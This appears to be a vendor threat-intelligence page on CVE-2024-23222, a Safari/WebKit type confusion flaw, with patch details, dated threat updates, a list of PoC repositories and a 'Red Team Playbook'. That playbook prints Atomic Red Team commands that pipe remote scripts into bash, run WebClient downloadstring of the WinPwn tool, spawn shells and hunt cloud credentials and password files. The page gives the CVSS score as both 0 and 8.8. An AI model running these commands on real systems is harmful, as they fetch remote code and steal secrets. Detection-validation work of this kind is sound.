CVE-2024-23222
Overview
This vulnerability is a type confusion flaw occurring within the Apple Safari browser engine. The root cause lies in insufficient type validation during the processing of web content, leading to erroneous assumptions about object types in memory. The affected component is the Safari browser's JavaScript engine, which mishandles crafted data structures, resulting in memory corruption conditions.
Vulnerability Description
A type confusion issue was addressed with improved checks. This issue is fixed in Safari 17.3, iOS 15.8.7 and iPadOS 15.8.7, iOS 16.7.5 and iPadOS 16.7.5, iOS 17.3 and iPadOS 17.3, macOS Monterey 12.7.3, macOS Sonoma 14.3, macOS Ventura 13.6.4, tvOS 17.3, visionOS 1.0.2. Processing maliciously crafted web content may lead to arbitrary code execution. This fix associated with the Coruna exploit was shipped in iOS 17.3 on January 22, 2024. This update brings that fix to devices that cannot update to the latest iOS version.
Impact
An attacker can execute arbitrary code on a target device by convincing a user to visit a maliciously crafted web page, leveraging the type confusion to corrupt memory and control execution flow. No authentication is required, and the attack vector is remote via web content delivery. This can lead to full compromise of the affected device, including unauthorized data access or system control. The vulnerability is rated with a CVSS score of 0 but enables remote code execution under realistic user interaction scenarios.
Solution
Apple addressed this vulnerability by releasing security updates for multiple platforms. Users should update Safari to version 17.3 and install iOS 15.8.7, iOS 16.7.5, iOS 17.3, iPadOS 15.8.7, iPadOS 16.7.5, iPadOS 17.3, macOS Monterey 12.7.3, macOS Sonoma 14.3, macOS Ventura 13.6.4, tvOS 17.3, or visionOS 1.0.2 as applicable. Detailed patch instructions and advisory information are available at https://support.apple.com/en-us/118479, https://support.apple.com/en-us/120304, and https://support.apple.com/en-us/120305.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A type confusion vulnerability is a critical flaw that arises when a program mistakenly interprets a variable as a different data type than it was intended to be. This discrepancy can lead to unexpected behaviors, including the execution of arbitrary code. In the case of affected Apple products, the vulnerability was addressed through enhanced checks in various operating systems and applications, including Safari, iOS, iPadOS, macOS, tvOS, and visionOS. The flaw allows an attacker to craft malicious web content that, when processed by the browser, can exploit this type confusion to execute unauthorized commands or access sensitive data. The technical remediation involved implementing stricter validation mechanisms to ensure that data types are correctly managed, thus mitigating the risk of exploitation.
The primary attack vector for this vulnerability is through malicious web content. Attackers may host specially crafted web pages or scripts that exploit the type confusion flaw when a user visits the site using an affected version of Safari or any of the other impacted Apple operating systems. Once the user interacts with the compromised content, the attacker can gain control over the execution flow of the application, potentially leading to full system compromise. Scenarios may include phishing attacks where users are tricked into visiting a malicious site, or drive-by downloads where simply visiting a page can trigger the exploit without user interaction. This makes the vulnerability particularly dangerous, as it can be leveraged against unsuspecting users with minimal effort.
The real-world impact of this vulnerability is significant, especially given its high CVSS score of 8.8, indicating a critical severity level. Organizations that rely on Apple devices for business operations face substantial risks, including data breaches, loss of sensitive information, and potential financial repercussions from remediation efforts. The ability for attackers to execute arbitrary code means that they could install malware, steal credentials, or manipulate data without the user's knowledge. Furthermore, the reputational damage resulting from a successful exploit could lead to a loss of customer trust and confidence, particularly in sectors that handle sensitive information, such as finance, healthcare, and e-commerce.
To effectively detect and mitigate this vulnerability, organizations should prioritize updating their systems to the latest versions of affected software as soon as patches are available. Regularly monitoring for updates and applying them promptly is essential to maintaining a secure environment. Additionally, employing web filtering solutions can help block access to known malicious sites that may attempt to exploit this vulnerability. Security awareness training for employees is also crucial, as it can help users recognize phishing attempts and avoid inadvertently visiting harmful web pages. Implementing robust endpoint protection solutions that can detect and respond to suspicious activities will further enhance an organization’s defense against potential exploitation.
In conclusion, the type confusion vulnerability affecting various Apple products poses a serious threat to both individual users and organizations. The potential for arbitrary code execution through malicious web content highlights the need for vigilant security practices, including timely updates, user education, and proactive monitoring. By understanding the technical details, attack vectors, and real-world implications of this vulnerability, organizations can better prepare themselves to defend against the evolving landscape of cybersecurity threats.
CSURFACE threat intelligence has observed a nuanced shift in the exploitation landscape of CVE-2024-23222. While telemetry indicates a significant reduction in detection activity related to this vulnerability, the Exploit Prediction Scoring System (EPSS) score has concurrently increased by over one-third, signaling a growing likelihood of exploitation attempts in the near term. This divergence suggests that while active exploitation campaigns may have temporarily subsided or become more covert, the underlying risk remains elevated, potentially due to the emergence of new proof-of-concept exploits and enhanced attacker understanding, as evidenced by recent public research and tool releases. The increase in EPSS, now approaching the upper quartile, underscores the need for continued vigilance despite the apparent drop in observed exploit activity. Consequently, the threat level for CVE-2024-23222 should be considered sustained at a high severity, with an emphasis on the potential for renewed or more sophisticated exploitation efforts that could leverage the existing Coruna exploit framework or its derivatives.
Update 2 — July 03, 2026
CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2024-23222, reflected by a modest uptick in telemetry triggers. This change coincides with the continued public availability and refinement of proof-of-concept exploits, including adaptations targeting multiple platforms beyond iOS, such as Linux x86_64. The persistence and subtle growth in detection signals suggest that threat actors are actively experimenting with or incorporating this vulnerability into their toolsets, potentially aiming to bypass existing mitigations. Although the Exploit Prediction Scoring System (EPSS) remains stable, the sustained presence of sophisticated exploit chains—particularly those enabling sandbox escapes and arbitrary code execution—underscores the ongoing operational relevance of this vulnerability. For defenders, this development highlights the necessity of maintaining heightened monitoring and response capabilities, as the vulnerability remains a viable vector for advanced exploitation. Consequently, the overall threat level for CVE-2024-23222 remains elevated, with a cautious outlook toward possible escalation in exploitation attempts leveraging evolving Coruna exploit variants and related toolkits.
Update 3 — July 11, 2026
CSURFACE threat intelligence has identified a notable surge in detection activity related to CVE-2024-23222, indicating increased adversary engagement with this WebKit type confusion vulnerability. This uptick in telemetry suggests that threat actors are intensifying efforts to leverage the Coruna exploit kit and its variants, which continue to demonstrate sophisticated sandbox escape and arbitrary code execution capabilities. Concurrently, new proof-of-concept exploits have emerged, expanding the exploit landscape beyond iOS to include Linux x86_64 environments, thereby broadening the potential attack surface. Although the EPSS score remains stable, the qualitative increase in exploitation attempts and the diversification of platforms targeted underscore a heightened operational interest. For defenders, this evolving activity signals a growing risk of successful exploitation in environments where patching is incomplete or delayed. Consequently, the threat level associated with CVE-2024-23222 is elevated further, warranting sustained vigilance and enhanced detection efforts to address the expanding scope and complexity of exploitation attempts.
Update 4 — July 20, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2024-23222, reflected by a modest uptick in telemetry triggers. This subtle rise, while not yet indicative of a widespread surge, suggests persistent adversary interest in leveraging the WebKit type confusion vulnerability despite the availability of patches across affected Apple platforms. Concurrently, new proof-of-concept exploits have surfaced, expanding the technical understanding and potential attack vectors, including sandbox escape chains and adaptations for alternative operating systems. These developments underscore the evolving sophistication and diversification of exploitation techniques associated with this vulnerability. For defenders, this means that environments with incomplete patching remain at tangible risk, and detection capabilities must adapt to the broadened exploit landscape. Although the overall risk level remains high, the incremental increase in exploitation activity and the emergence of novel exploit variants elevate the threat posture, warranting continued monitoring and analysis to preempt escalation.
Update 5 — August 04, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-23222, reflected by a significant uptick in detection activity across multiple telemetry sources. This increase coincides with the wider dissemination of new proof-of-concept exploits and advanced adaptations of the Coruna exploit kit, which now demonstrate expanded capabilities including sandbox escape and cross-platform applicability. The emergence of these refined exploit variants signals a growing sophistication in attacker methodologies, increasing the likelihood of successful compromise in environments where patching is incomplete or delayed. Although the EPSS score remains stable, the qualitative surge in exploitation attempts elevates the operational threat level, underscoring the urgency for defenders to maintain vigilant detection and response postures. This evolving landscape highlights the persistent risk posed by this vulnerability and the necessity for continuous monitoring to anticipate further exploit innovation.
Affected Products (12)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Apple | Safari | All |
cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*
|
|
|
Apple | Ipados | All |
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*
|
|
|
Apple | Ipados | All |
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*
|
|
|
Apple | Ipados | All |
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*
|
|
|
Apple | Iphone Os | All |
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*
|
|
|
Apple | Iphone Os | All |
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*
|
|
|
Apple | Iphone Os | All |
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*
|
|
|
Apple | Macos | All |
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*
|
|
|
Apple | Macos | All |
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*
|
|
|
Apple | Macos | All |
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*
|
|
|
Apple | Tvos | All |
cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:*
|
|
|
Apple | Visionos | All |
cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (4)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
FuzzySecurity/Cassowary-CVE-2024-23222-x86_64
Adaptation of Cassowary CVE-2024-23222 for Linux x86_64
|
FuzzySecurity | 10 | 1 | 2026-03-13 | View |
|
Rohitberiwala/CVE-2024-23222-Coruna-Exploit-Kit-Deobfuscated
Comprehensive deobfuscated research of the Coruna iOS exploit kit targeting CVE-2024-23222. Analysis of WebKit Type Conf...
|
Rohitberiwala | 6 | 1 | 2026-03-10 | View |
|
Meysamshiralii/coruna_analysis
Analyze and deobfuscate the Coruna Exploit Kit (CVE-2024-23222) to enhance understanding and detection of related threat...
|
Meysamshiralii | 2 | 0 | 2026-03-15 | View |
|
Umit-MHL/webkit-cve-2024-23222
CVE-2024-23222 WebKit type confusion → iOS 16.4.1 sandbox escape. Full chain: JSC JIT confusion → addrof/read64/write64 ...
|
Umit-MHL | 1 | 0 | 2026-05-19 | View |
Threat Feed
20 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (26)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-23222 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/118479 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/120304 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/120305 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/120307 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/120309 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/120310 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/120311 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/120339 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/126632 |
| seclists.org |
NVD API
Third Party Advisory
|
http://seclists.org/fulldisclosure/2024/Feb/6 |
| seclists.org |
NVD API
Third Party Advisory
|
http://seclists.org/fulldisclosure/2024/Jan/34 |
| seclists.org |
NVD API
Third Party Advisory
|
http://seclists.org/fulldisclosure/2024/Jan/40 |
| lists.fedoraproject.org |
NVD API
Broken Link
|
https://lists.fedoraproject.org/archives/list/[email protected]/message/US43EQFC2IS66EA2CPAZFH2RQ6WD7PKF/ |
| support.apple.com |
NVD API
Release Notes
Vendor Advisory
|
https://support.apple.com/en-us/HT214055 |
| support.apple.com |
NVD API
Release Notes
Vendor Advisory
|
https://support.apple.com/en-us/HT214059 |
| support.apple.com |
NVD API
Release Notes
Vendor Advisory
|
https://support.apple.com/en-us/HT214061 |
| support.apple.com |
NVD API
Release Notes
Vendor Advisory
|
https://support.apple.com/kb/HT214055 |
| support.apple.com |
NVD API
Release Notes
Vendor Advisory
|
https://support.apple.com/kb/HT214056 |
| support.apple.com |
NVD API
Release Notes
Vendor Advisory
|
https://support.apple.com/kb/HT214057 |
| support.apple.com |
NVD API
Release Notes
Vendor Advisory
|
https://support.apple.com/kb/HT214058 |
| support.apple.com |
NVD API
Release Notes
Vendor Advisory
|
https://support.apple.com/kb/HT214059 |
| support.apple.com |
NVD API
Release Notes
Vendor Advisory
|
https://support.apple.com/kb/HT214061 |
| support.apple.com |
NVD API
Release Notes
Vendor Advisory
|
https://support.apple.com/kb/HT214063 |
| support.apple.com |
NVD API
Release Notes
Vendor Advisory
|
https://support.apple.com/kb/HT214070 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-23222 |